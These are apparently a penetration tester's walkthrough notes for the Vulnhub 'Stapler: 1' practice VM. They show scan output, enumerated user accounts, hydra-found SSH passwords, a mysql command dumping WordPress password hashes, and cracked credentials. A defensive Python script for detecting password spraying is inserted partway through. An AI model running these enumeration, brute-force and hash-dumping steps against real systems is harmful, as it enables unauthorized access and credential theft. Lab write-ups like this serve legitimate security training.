Wednesday, October 9, 2019

Vulnhub: Stapler: 1

source: https://www.vulnhub.com/entry/stapler-1,150/

192.168.1.94


nmap:

21/tcp    open ftp         vsftpd 2.0.8 or later
22/tcp    open ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
53/tcp    open domain      dnsmasq 2.75
80/tcp    open http        PHP cli server 5.5 or later
139/tcp   open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
666/tcp   open doom?
3306/tcp  open mysql       MySQL 5.7.12-0ubuntu1
12380/tcp open http        Apache httpd 2.4.18 ((Ubuntu))



maybe ubuntu 16.04


ftp anonymous login:
Harry, make sure to update the banner when you get a chance to show who has access here
cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.


nikto -host 192.168.1.94:
+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.
+ OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.


nikto -host 192.168.1.94 -port 12380 -ssl:
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ /phpmyadmin/: phpMyAdmin directory found


gobuster dir -k -u https://192.168.1.94:12380 -w /usr/share/seclists/Discovery/Web-Content/common.txt -s "200,301,302" -t 4:
/announcements (Status: 301)
/index.html (Status: 200)
/javascript (Status: 301)
/phpmyadmin (Status: 301)
/robots.txt (Status: 200)

enum4linux:
[+] Attempting to map shares on 192.168.1.94
//192.168.1.94/print$   Mapping: DENIED, Listing: N/A
//192.168.1.94/kathy    Mapping: OK, Listing: OK
//192.168.1.94/tmp      Mapping: OK, Listing: OK
//192.168.1.94/IPC$     [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\peter (Local User)
S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1019 Unix User\Sam (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1021 Unix User\jess (Local User)
S-1-22-1-1022 Unix User\SHAY (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1024 Unix User\mel (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1026 Unix User\zoe (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)

smbclient //192.168.1.94/kathy -N
wordpress 4.2.1

hydra:
username SHayslett, password SHayslett

username Drew, password qwerty
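
Assuming the hydra run above tried the enumerated accounts against SSH, the defending side sees one source failing against many distinct users and then succeeding. The following is an added example, not part of the original notes: a Python check over constructed sshd auth.log lines, where the log lines, the source addresses and the `min_users` threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed sshd auth.log lines (not from the original page). Source IPs are
# placeholders; host and account names are taken from the notes above.
SAMPLE_LOG = """\
Oct  9 10:01:02 red sshd[2101]: Failed password for peter from 192.168.1.50 port 40112 ssh2
Oct  9 10:01:03 red sshd[2103]: Failed password for RNunemaker from 192.168.1.50 port 40114 ssh2
Oct  9 10:01:04 red sshd[2105]: Failed password for invalid user admin from 192.168.1.50 port 40116 ssh2
Oct  9 10:01:05 red sshd[2107]: Failed password for ETollefson from 192.168.1.50 port 40118 ssh2
Oct  9 10:01:06 red sshd[2109]: Accepted password for SHayslett from 192.168.1.50 port 40120 ssh2
Oct  9 10:07:41 red sshd[2200]: Failed password for Drew from 192.168.1.77 port 51000 ssh2
Oct  9 10:07:55 red sshd[2202]: Accepted password for Drew from 192.168.1.77 port 51002 ssh2
"""

# Matches both "Failed password for <user>" and "... for invalid user <user>".
LINE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def find_spraying(log_text, min_users=3):
    """Return {ip: {"failed_users": [...], "accepted_logins": [...]}} for every
    source that failed against at least `min_users` distinct accounts."""
    failed = defaultdict(set)     # ip -> accounts with failed logins
    accepted = defaultdict(list)  # ip -> accounts logged in, in order seen
    for line in log_text.splitlines():
        m = LINE.search(line)
        if not m:
            continue
        if m["result"] == "Failed":
            failed[m["ip"]].add(m["user"])
        elif m["user"] not in accepted[m["ip"]]:
            accepted[m["ip"]].append(m["user"])
    report = {}
    for ip, users in failed.items():
        # One user mistyping a password stays below the threshold.
        if len(users) >= min_users:
            report[ip] = {"failed_users": sorted(users),
                          "accepted_logins": accepted.get(ip, [])}
    return report

if __name__ == "__main__":
    for ip, hit in find_spraying(SAMPLE_LOG).items():
        print(ip, "failed against", len(hit["failed_users"]), "accounts;",
              "accepted logins to review:", hit["accepted_logins"])
```

An accepted login from a flagged source is the account to lock and rotate first.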

ssh:

Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux

DISTRIB_DESCRIPTION="Ubuntu 16.04 LTS"





mysql -uroot -pplbkac -sN -e "SELECT user_login, user_pass FROM wordpress.wp_users"


john-the-ripper:
garry:football
harry:monkey
scott:cookie
kathy:coolgirl
barry:washere
John:incorrect
tim:thumb
Pam:0520
heather:passphrase
Dave:damachine
Elly:ylle
ZOE:partyqueen

wordpress login username John, password incorrect
